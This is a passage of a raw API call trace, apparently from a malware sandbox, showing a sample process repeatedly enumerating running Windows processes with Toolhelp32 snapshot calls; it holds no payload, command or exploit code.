hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.926] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.928] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.930] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.931] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.932] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.935] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.936] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.947] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.949] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.953] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.961] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.962] CloseHandle (hObject=0xc4) returned 1 [0109.962] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0109.967] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.994] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.996] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.997] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.998] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.999] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 